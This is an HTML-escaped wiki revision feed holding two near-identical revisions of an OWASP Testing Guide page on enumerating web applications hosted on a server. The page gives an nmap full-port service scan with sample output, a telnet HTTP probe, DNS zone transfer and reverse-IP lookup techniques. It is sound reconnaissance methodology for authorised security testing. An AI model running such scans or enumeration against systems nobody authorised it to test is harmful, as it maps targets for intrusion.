'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in Black Box testing no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12234</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12234"/>
				<updated>2006-11-10T15:16:29Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Gray Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies than can be exploited in order to gain remote control and/or data exploitation.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without reference from the main website: this is true for internal and/or extranet website which could be misconfigured or not updated due to the perception they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common path for administrative interfaces which can be used to guess or bruteforce administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is loosing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, is given a set of IP addresses (or possibly just one) as a target to test. No other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated to unrelated symbolic (DNS) names. Obviously the extent of your analysis is deeply affected by the fact that you test the applications, or you do not - because you don't notice them, or you notice only SOME of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed out a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even being aware of that! (this is more likely to happen in large organizations).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may consist also of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be the most comprehensive in scope, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated to a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location is not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows to associate a single IP address to one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated to DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be reflected to serve different content by using so called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no way to full-proof ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe handing them out. However, we may employ a few criteria that will aid in their quest.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help with this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, while this URL could not be referenced anywhere (after all, employees would know where the webmail application is located, while there is no reason to tell this information to outsiders by publishing it onto the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: A Tomcat administrative interface), and yet not being referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield back some results. Vulnerability scanners may help with this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap –P0 –sT –sV –p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and looking for http or the indication of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.10.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that in fact it is an HTTP server. Alternatively,we could have visited the URL with a web browser; or used the GET or HEAD Perl commands, which mimick HTTP interactions such as the one given above (however HEAD requests may not be honored by all servers)&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – with respect to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is a number of techniques which may be used to identify DNS names associated to a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is nowadays of limited usage, given the fact that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested to the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.  &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not granted.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to DNS zone transfer, but relies on web-based services which allow to perform name-based searched on DNS. One such a service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com''. Then you will check whether the names you obtained are pertaining to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There is a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered the most information you can with the previous techniques, you can rely on search engines to possibly refine and increment your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same listed in [[Black Box testing and example]] no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
